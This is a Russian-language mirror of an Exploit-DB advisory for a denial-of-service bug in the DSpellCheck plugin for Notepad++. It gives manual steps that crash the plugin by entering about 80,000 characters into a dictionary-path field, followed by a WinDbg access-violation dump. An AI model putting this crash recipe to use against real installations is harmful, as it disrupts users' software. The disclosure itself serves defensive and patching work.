- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32706
- Проверка EDB
-
- Пройдено
- Автор
- SAJITH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2014-04-06
Код:
# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/
# vulnerable plugin Version: DSpellCheck v 1.2.12.0
# Tested in: Windows XP SP3 EN,Notepad ++ 6.5.4
POC:
1)install notepadd ++
2)open up plugins tab and select Dspellcheck and click on settings
3)In "hunspell dictionaries path" field enter large character say 80000 A's
and click on "apply"
##########################################################
(cf8.4f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00690044 ebx=00000000 ecx=00000294 edx=01f56070 esi=01f56060
edi=00000000
eip=7c919fca esp=01d0ed74 ebp=01d0ede8 iopl=0 nv up ei pl zr na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010246
ntdll!RtlpWaitForCriticalSection+0x5b:
7c919fca ff4010 inc dword ptr [eax+10h]
ds:0023:00690054=bc5d0050
####################################################
FAULTING_IP:
ntdll!RtlpWaitForCriticalSection+5b
7c919fca ff4010 inc dword ptr [eax+10h]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 7c919fca (ntdll!RtlpWaitForCriticalSection+0x0000005b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00690054
Attempt to write to address 00690054
FAULTING_THREAD: 000004f8
PROCESS_NAME: notepad++.exe
.
FAULTING_MODULE: 7c900000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP: 52c4419f
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced
memory at "0x%08lx". The memory could not be "%s".
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx"
referenced memory at "0x%08lx". The memory could not be "%s".
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 00690054
WRITE_ADDRESS: 00690054
FOLLOWUP_IP:
DSpellCheck!setInfo+577f5
012f4cb5 59 pop ecx
CRITICAL_SECTION: 00f56060 -- (!cs -s 00f56060)
BUGCHECK_STR:
APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_WRONG_SYMBOLS
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE
DEFAULT_BUCKET_ID: STRING_DEREFERENCE
LAST_CONTROL_TRANSFER: from 7c901046 to 7c919fca
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
01d0ede8 7c901046 00f56060 012feb19 01f56060
ntdll!RtlpWaitForCriticalSection+0x5b
01d0ee00 012f4cb5 00000013 012f8787 00000003
ntdll!RtlEnterCriticalSection+0x46
01d0ee48 012f15f0 908eab95 01654af8 00000000 DSpellCheck!setInfo+0x577f5
01d0ee7c 012f166b 01f54058 0130e360 00000040 DSpellCheck!setInfo+0x54130
01d0ee8c 012aecaa 01f54058 0130e360 01f56056 DSpellCheck!setInfo+0x541ab
01d0ee90 01f54058 0130e360 01f56056 00000000 DSpellCheck!setInfo+0x117ea
01d0ee94 0130e360 01f56056 00000000 016549a8 0x1f54058
01d0ee98 01f56056 00000000 016549a8 00000000 DSpellCheck!setInfo+0x70ea0
01d0ee9c 00000000 016549a8 00000000 00000000 0x1f56056
SYMBOL_STACK_INDEX: 2
SYMBOL_NAME: DSpellCheck!setInfo+577f5
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: DSpellCheck
IMAGE_NAME: DSpellCheck.dll
STACK_COMMAND: ~4s ; kb
BUCKET_ID: WRONG_SYMBOLS
FAILURE_BUCKET_ID: STRING_DEREFERENCE_c0000005_DSpellCheck.dll!setInfo
Followup: MachineOwner
####################################################
- Источник
- www.exploit-db.com